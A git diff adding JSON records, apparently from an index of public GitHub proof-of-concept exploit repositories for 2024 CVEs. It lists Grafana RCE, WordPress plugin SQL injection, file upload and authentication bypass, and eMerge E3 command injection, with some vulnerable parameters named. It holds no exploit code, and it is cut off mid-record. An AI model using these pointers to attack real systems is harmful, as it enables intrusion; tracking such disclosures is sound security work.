BigUp Plugin Unauthenticated RCE", + "fork": false, + "created_at": "2024-09-06T18:17:18Z", + "updated_at": "2024-10-21T13:18:26Z", + "pushed_at": "2024-09-07T00:12:51Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-8522.json b/2024/CVE-2024-8522.json new file mode 100644 index 0000000000..e26a122412 --- /dev/null +++ b/2024/CVE-2024-8522.json @@ -0,0 +1,33 @@ +[ + { + "id": 859722645, + "name": "CVE-2024-8522", + "full_name": "Avento\/CVE-2024-8522", + "owner": { + "login": "Avento", + "id": 13798539, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13798539?v=4", + "html_url": "https:\/\/github.com\/Avento", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Avento\/CVE-2024-8522", + "description": "LearnPress – WordPress LMS Plugin <= 4.2.7 - Unauthenticated SQL Injection via 'c_only_fields'", + "fork": false, + "created_at": "2024-09-19T07:04:12Z", + "updated_at": "2024-10-12T13:02:49Z", + "pushed_at": "2024-09-19T07:06:15Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-8529.json b/2024/CVE-2024-8529.json new file mode 100644 index 0000000000..33a05f47b6 --- /dev/null +++ b/2024/CVE-2024-8529.json @@ -0,0 +1,33 @@ +[ + { + "id": 871753655, + "name": "CVE-2024-8529", + "full_name": "RandomRobbieBF\/CVE-2024-8529", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-8529", + "description": "LearnPress – WordPress LMS Plugin <= 4.2.7 - Unauthenticated SQL Injection via 'c_fields'", + "fork": false, + "created_at": "2024-10-12T20:52:32Z", + "updated_at": "2024-10-20T20:02:46Z", + "pushed_at": "2024-10-12T20:55:55Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-8698.json b/2024/CVE-2024-8698.json new file mode 100644 index 0000000000..36658f1ac1 --- /dev/null +++ b/2024/CVE-2024-8698.json @@ -0,0 +1,33 @@ +[ + { + "id": 870632664, + "name": "CVE-2024-8698-POC", + "full_name": "huydoppaz\/CVE-2024-8698-POC", + "owner": { + "login": "huydoppaz", + "id": 180631518, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/180631518?v=4", + "html_url": "https:\/\/github.com\/huydoppaz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/huydoppaz\/CVE-2024-8698-POC", + "description": "i'm noob with saml and keycloak . J4f", + "fork": false, + "created_at": "2024-10-10T11:50:07Z", + "updated_at": "2024-10-13T15:06:35Z", + "pushed_at": "2024-10-10T12:09:42Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-8752.json b/2024/CVE-2024-8752.json new file mode 100644 index 0000000000..158c9918fe --- /dev/null +++ b/2024/CVE-2024-8752.json @@ -0,0 +1,33 @@ +[ + { + "id": 859630956, + "name": "CVE-2024-8752", + "full_name": "D3anSPGDMS\/CVE-2024-8752", + "owner": { + "login": "D3anSPGDMS", + "id": 179800496, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179800496?v=4", + "html_url": "https:\/\/github.com\/D3anSPGDMS", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/D3anSPGDMS\/CVE-2024-8752", + "description": "poc of cve-2024-8752(WebIQ 2.15.9)", + "fork": false, + "created_at": "2024-09-19T02:20:48Z", + "updated_at": "2024-09-19T02:28:30Z", + "pushed_at": "2024-09-19T02:28:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-8856.json b/2024/CVE-2024-8856.json new file mode 100644 index 0000000000..551f6231f5 --- /dev/null +++ b/2024/CVE-2024-8856.json @@ -0,0 +1,74 @@ +[ + { + "id": 889626915, + "name": "CVE-2024-8856", + "full_name": "ubaii\/CVE-2024-8856", + "owner": { + "login": "ubaii", + "id": 31325580, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31325580?v=4", + "html_url": "https:\/\/github.com\/ubaii", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ubaii\/CVE-2024-8856", + "description": "WordPress WP Time Capsule Plugin Arbitrary File Upload Vulnerability", + "fork": false, + "created_at": "2024-11-16T20:04:11Z", + "updated_at": "2024-11-22T12:53:51Z", + "pushed_at": "2024-11-16T20:04:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 891847903, + "name": "CVE-2024-8856", + "full_name": "Jenderal92\/CVE-2024-8856", + "owner": { + "login": "Jenderal92", + "id": 59664965, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59664965?v=4", + "html_url": "https:\/\/github.com\/Jenderal92", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jenderal92\/CVE-2024-8856", + "description": "This tool scans WordPress websites for vulnerabilities in the WP Time Capsule plugin related to CVE-2024-8856. It identifies plugin versions below 1.22.22 as vulnerable and logs results to vuln.txt. Simple and efficient, it helps security researchers and admins detect and address risks quickly.", + "fork": false, + "created_at": "2024-11-21T04:01:27Z", + "updated_at": "2024-11-21T04:41:29Z", + "pushed_at": "2024-11-21T04:41:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-8856", + "cve-scanner", + "plugin-vulnerability", + "security-tools", + "vulnerability", + "wordpress", + "wordpress-plugin-scanner", + "wordpress-security", + "wp-time-capsule" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-8868.json b/2024/CVE-2024-8868.json new file mode 100644 index 0000000000..f9216b793e --- /dev/null +++ b/2024/CVE-2024-8868.json @@ -0,0 +1,33 @@ +[ + { + "id": 619573346, + "name": "CVE-2024-8868", + "full_name": "M0onc\/CVE-2024-8868", + "owner": { + "login": "M0onc", + "id": 129066230, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129066230?v=4", + "html_url": "https:\/\/github.com\/M0onc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/M0onc\/CVE-2024-8868", + "description": "1", + "fork": false, + "created_at": "2023-03-27T12:08:34Z", + "updated_at": "2024-11-04T03:59:54Z", + "pushed_at": "2023-03-27T12:08:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-8949.json b/2024/CVE-2024-8949.json new file mode 100644 index 0000000000..1df0e8f6f4 --- /dev/null +++ b/2024/CVE-2024-8949.json @@ -0,0 +1,33 @@ +[ + { + "id": 864585046, + "name": "CVE-2024-8949-POC", + "full_name": "gh-ost00\/CVE-2024-8949-POC", + "owner": { + "login": "gh-ost00", + "id": 153366162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153366162?v=4", + "html_url": "https:\/\/github.com\/gh-ost00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gh-ost00\/CVE-2024-8949-POC", + "description": "SourceCodester Online Eyewear Shop Remote File Inclusion Vulnerability", + "fork": false, + "created_at": "2024-09-28T15:58:54Z", + "updated_at": "2024-09-28T16:06:34Z", + "pushed_at": "2024-09-28T16:06:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-8963.json b/2024/CVE-2024-8963.json new file mode 100644 index 0000000000..d49f833256 --- /dev/null +++ b/2024/CVE-2024-8963.json @@ -0,0 +1,33 @@ +[ + { + "id": 887922973, + "name": "CVE-2024-8963", + "full_name": "patfire94\/CVE-2024-8963", + "owner": { + "login": "patfire94", + "id": 167763968, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/167763968?v=4", + "html_url": "https:\/\/github.com\/patfire94", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/patfire94\/CVE-2024-8963", + "description": "Ivanti Cloud Services Appliance - Path Traversal", + "fork": false, + "created_at": "2024-11-13T14:12:57Z", + "updated_at": "2024-11-13T20:10:06Z", + "pushed_at": "2024-11-13T20:10:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9014.json b/2024/CVE-2024-9014.json new file mode 100644 index 0000000000..05e56f5d5f --- /dev/null +++ b/2024/CVE-2024-9014.json @@ -0,0 +1,33 @@ +[ + { + "id": 863460886, + "name": "CVE-2024-9014", + "full_name": "EQSTLab\/CVE-2024-9014", + "owner": { + "login": "EQSTLab", + "id": 148991397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148991397?v=4", + "html_url": "https:\/\/github.com\/EQSTLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EQSTLab\/CVE-2024-9014", + "description": "Proof-of-Concept for CVE-2024-9014", + "fork": false, + "created_at": "2024-09-26T10:34:34Z", + "updated_at": "2024-10-15T07:52:36Z", + "pushed_at": "2024-09-26T10:45:34Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9061.json b/2024/CVE-2024-9061.json new file mode 100644 index 0000000000..e4c0e12bc1 --- /dev/null +++ b/2024/CVE-2024-9061.json @@ -0,0 +1,33 @@ +[ + { + "id": 873461230, + "name": "CVE-2024-9061", + "full_name": "RandomRobbieBF\/CVE-2024-9061", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-9061", + "description": "WP Popup Builder – Popup Forms and Marketing Lead Generation <= 1.3.5 - Unauthenticated Arbitrary Shortcode Execution via wp_ajax_nopriv_shortcode_Api_Add", + "fork": false, + "created_at": "2024-10-16T07:57:48Z", + "updated_at": "2024-10-18T17:57:08Z", + "pushed_at": "2024-10-16T07:59:43Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9106.json b/2024/CVE-2024-9106.json new file mode 100644 index 0000000000..f49addf783 --- /dev/null +++ b/2024/CVE-2024-9106.json @@ -0,0 +1,33 @@ +[ + { + "id": 865906316, + "name": "CVE-2024-9106", + "full_name": "RandomRobbieBF\/CVE-2024-9106", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-9106", + "description": "Wechat Social login <= 1.3.0 - Authentication Bypass", + "fork": false, + "created_at": "2024-10-01T10:28:08Z", + "updated_at": "2024-10-18T17:57:33Z", + "pushed_at": "2024-10-01T10:31:05Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9162.json b/2024/CVE-2024-9162.json new file mode 100644 index 0000000000..e0b879a787 --- /dev/null +++ b/2024/CVE-2024-9162.json @@ -0,0 +1,33 @@ +[ + { + "id": 865025034, + "name": "CVE-2024-9162", + "full_name": "d0n601\/CVE-2024-9162", + "owner": { + "login": "d0n601", + "id": 8961705, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8961705?v=4", + "html_url": "https:\/\/github.com\/d0n601", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d0n601\/CVE-2024-9162", + "description": "All-in-One WP Migration and Backup <= 7.86 - Authenticated (Administrator+) Arbitrary PHP Code Injection", + "fork": false, + "created_at": "2024-09-29T19:34:59Z", + "updated_at": "2024-10-29T21:42:00Z", + "pushed_at": "2024-10-27T21:45:12Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9166.json b/2024/CVE-2024-9166.json new file mode 100644 index 0000000000..b6a7461e5b --- /dev/null +++ b/2024/CVE-2024-9166.json @@ -0,0 +1,41 @@ +[ + { + "id": 863789576, + "name": "CVE-2024-9166", + "full_name": "Andrysqui\/CVE-2024-9166", + "owner": { + "login": "Andrysqui", + "id": 130909666, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130909666?v=4", + "html_url": "https:\/\/github.com\/Andrysqui", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Andrysqui\/CVE-2024-9166", + "description": "A vulnerability scanner that searches for the CVE-2024-9166 vulnerability on websites, more info about this vulnerability here: https:\/\/www.tenable.com\/cve\/CVE-2024-9166", + "fork": false, + "created_at": "2024-09-26T23:21:06Z", + "updated_at": "2024-11-10T16:23:27Z", + "pushed_at": "2024-10-01T02:46:37Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "ethical-hacking", + "ethical-hacking-tools", + "hacking-script", + "penetration-testing", + "pentest-tool", + "python-script", + "python3" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9224.json b/2024/CVE-2024-9224.json new file mode 100644 index 0000000000..4a697efbf2 --- /dev/null +++ b/2024/CVE-2024-9224.json @@ -0,0 +1,33 @@ +[ + { + "id": 871101035, + "name": "CVE-2024-9224", + "full_name": "RandomRobbieBF\/CVE-2024-9224", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-9224", + "description": "Hello World <= 2.1.1 - Authenticated (Subscriber+) Arbitrary File Read", + "fork": false, + "created_at": "2024-10-11T09:17:20Z", + "updated_at": "2024-10-18T17:57:23Z", + "pushed_at": "2024-10-11T09:21:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9234.json b/2024/CVE-2024-9234.json new file mode 100644 index 0000000000..f674762059 --- /dev/null +++ b/2024/CVE-2024-9234.json @@ -0,0 +1,64 @@ +[ + { + "id": 874396366, + "name": "CVE-2024-9234", + "full_name": "RandomRobbieBF\/CVE-2024-9234", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-9234", + "description": "GutenKit <= 2.1.0 - Unauthenticated Arbitrary File Upload", + "fork": false, + "created_at": "2024-10-17T18:48:12Z", + "updated_at": "2024-10-18T17:57:06Z", + "pushed_at": "2024-10-17T18:49:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 884623982, + "name": "CVE-2024-9234", + "full_name": "CallMeBatosay\/CVE-2024-9234", + "owner": { + "login": "CallMeBatosay", + "id": 130114991, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130114991?v=4", + "html_url": "https:\/\/github.com\/CallMeBatosay", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CallMeBatosay\/CVE-2024-9234", + "description": null, + "fork": false, + "created_at": "2024-11-07T04:56:44Z", + "updated_at": "2024-11-07T05:04:21Z", + "pushed_at": "2024-11-07T05:04:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9264.json b/2024/CVE-2024-9264.json new file mode 100644 index 0000000000..80df8d3a03 --- /dev/null +++ b/2024/CVE-2024-9264.json @@ -0,0 +1,150 @@ +[ + { + "id": 875253753, + "name": "CVE-2024-9264", + "full_name": "nollium\/CVE-2024-9264", + "owner": { + "login": "nollium", + "id": 54525684, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54525684?v=4", + "html_url": "https:\/\/github.com\/nollium", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nollium\/CVE-2024-9264", + "description": "Exploit for Grafana arbitrary file-read and RCE (CVE-2024-9264)", + "fork": false, + "created_at": "2024-10-19T13:50:52Z", + "updated_at": "2024-11-24T11:10:43Z", + "pushed_at": "2024-11-21T17:43:56Z", + "stargazers_count": 83, + "watchers_count": 83, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "authenticated", + "cve", + "cve-2024-9264", + "exploit", + "file-read-vulnerability", + "grafana", + "poc", + "rce", + "rce-exploit", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 17, + "watchers": 83, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 875437112, + "name": "File-Read-CVE-2024-9264", + "full_name": "z3k0sec\/File-Read-CVE-2024-9264", + "owner": { + "login": "z3k0sec", + "id": 135271952, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/135271952?v=4", + "html_url": "https:\/\/github.com\/z3k0sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/z3k0sec\/File-Read-CVE-2024-9264", + "description": "File Read Proof of Concept for CVE-2024-9264", + "fork": false, + "created_at": "2024-10-20T01:13:37Z", + "updated_at": "2024-11-20T16:31:08Z", + "pushed_at": "2024-10-20T11:46:34Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-9264", + "exploit", + "grafana", + "poc" + ], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 875890256, + "name": "CVE-2024-9264-RCE-Exploit", + "full_name": "z3k0sec\/CVE-2024-9264-RCE-Exploit", + "owner": { + "login": "z3k0sec", + "id": 135271952, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/135271952?v=4", + "html_url": "https:\/\/github.com\/z3k0sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/z3k0sec\/CVE-2024-9264-RCE-Exploit", + "description": "Grafana RCE exploit (CVE-2024-9264)", + "fork": false, + "created_at": "2024-10-21T03:36:05Z", + "updated_at": "2024-11-28T17:34:18Z", + "pushed_at": "2024-10-21T22:31:47Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-9264", + "duckdb", + "exploit", + "grafana", + "rce", + "shellfs" + ], + "visibility": "public", + "forks": 3, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 876056610, + "name": "Grafana-CVE-2024-9264", + "full_name": "PunitTailor55\/Grafana-CVE-2024-9264", + "owner": { + "login": "PunitTailor55", + "id": 38101321, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38101321?v=4", + "html_url": "https:\/\/github.com\/PunitTailor55", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PunitTailor55\/Grafana-CVE-2024-9264", + "description": null, + "fork": false, + "created_at": "2024-10-21T10:25:27Z", + "updated_at": "2024-10-21T10:26:17Z", + "pushed_at": "2024-10-21T10:26:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9326.json b/2024/CVE-2024-9326.json new file mode 100644 index 0000000000..a8be47e1c3 --- /dev/null +++ b/2024/CVE-2024-9326.json @@ -0,0 +1,33 @@ +[ + { + "id": 895094470, + "name": "CVE-2024-9326-PoC", + "full_name": "ghostwirez\/CVE-2024-9326-PoC", + "owner": { + "login": "ghostwirez", + "id": 64195231, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64195231?v=4", + "html_url": "https:\/\/github.com\/ghostwirez", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ghostwirez\/CVE-2024-9326-PoC", + "description": "This PoC script is designed to verify the presence of CVE-2024-9326, a high SQL Injection vulnerability in PHPGurukul Online Shopping Portal v2.0. It automates the exploitation process to determine if the target web application is vulnerable, allowing security professionals to assess and confirm the flaw's existence.", + "fork": false, + "created_at": "2024-11-27T14:49:54Z", + "updated_at": "2024-11-27T14:52:57Z", + "pushed_at": "2024-11-27T14:52:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9441.json b/2024/CVE-2024-9441.json new file mode 100644 index 0000000000..ad22a42684 --- /dev/null +++ b/2024/CVE-2024-9441.json @@ -0,0 +1,100 @@ +[ + { + "id": 867057499, + "name": "CVE-2024-9441", + "full_name": "adhikara13\/CVE-2024-9441", + "owner": { + "login": "adhikara13", + "id": 44716348, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44716348?v=4", + "html_url": "https:\/\/github.com\/adhikara13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adhikara13\/CVE-2024-9441", + "description": "Nortek Linear eMerge E3 Pre-Auth RCE PoC (CVE-2024-9441)", + "fork": false, + "created_at": "2024-10-03T11:28:46Z", + "updated_at": "2024-10-16T04:34:58Z", + "pushed_at": "2024-10-03T11:32:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 870893978, + "name": "CVE-2024-9441", + "full_name": "p33d\/CVE-2024-9441", + "owner": { + "login": "p33d", + "id": 123099747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123099747?v=4", + "html_url": "https:\/\/github.com\/p33d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p33d\/CVE-2024-9441", + "description": null, + "fork": false, + "created_at": "2024-10-10T21:29:08Z", + "updated_at": "2024-10-21T13:17:46Z", + "pushed_at": "2024-10-10T21:33:29Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892378403, + "name": "cve-2024-9441-poc", + "full_name": "XiaomingX\/cve-2024-9441-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-9441-poc", + "description": "CVE-2024-9441是影响Linear eMerge e3系列(版本1.00-07及之前)的操作系统命令注入漏洞。未经身份验证的远程攻击者可通过HTTP请求中“forgot_password”功能的“login_id”参数,执行任意操作系统命令。", + "fork": false, + "created_at": "2024-11-22T02:04:21Z", + "updated_at": "2024-11-22T13:43:44Z", + "pushed_at": "2024-11-22T02:07:52Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-9441", + "exp", + "poc" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9464.json b/2024/CVE-2024-9464.json new file mode 100644 index 0000000000..897e52b9cf --- /dev/null +++ b/2024/CVE-2024-9464.json @@ -0,0 +1,33 @@ +[ + { + "id": 870215749, + "name": "CVE-2024-9464", + "full_name": "horizon3ai\/CVE-2024-9464", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2024-9464", + "description": "Proof of Concept Exploit for CVE-2024-9464", + "fork": false, + "created_at": "2024-10-09T16:36:25Z", + "updated_at": "2024-11-25T11:50:34Z", + "pushed_at": "2024-10-09T16:41:41Z", + "stargazers_count": 43, + "watchers_count": 43, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 43, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9465.json b/2024/CVE-2024-9465.json new file mode 100644 index 0000000000..00f28a7d40 --- /dev/null +++ b/2024/CVE-2024-9465.json @@ -0,0 +1,64 @@ +[ + { + "id": 870208687, + "name": "CVE-2024-9465", + "full_name": "horizon3ai\/CVE-2024-9465", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2024-9465", + "description": "Proof of Concept Exploit for CVE-2024-9465", + "fork": false, + "created_at": "2024-10-09T16:22:05Z", + "updated_at": "2024-11-26T23:20:04Z", + "pushed_at": "2024-10-09T16:34:42Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 27, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 870541259, + "name": "CVE-2024-9465", + "full_name": "mustafaakalin\/CVE-2024-9465", + "owner": { + "login": "mustafaakalin", + "id": 121257754, + "avatar_url": 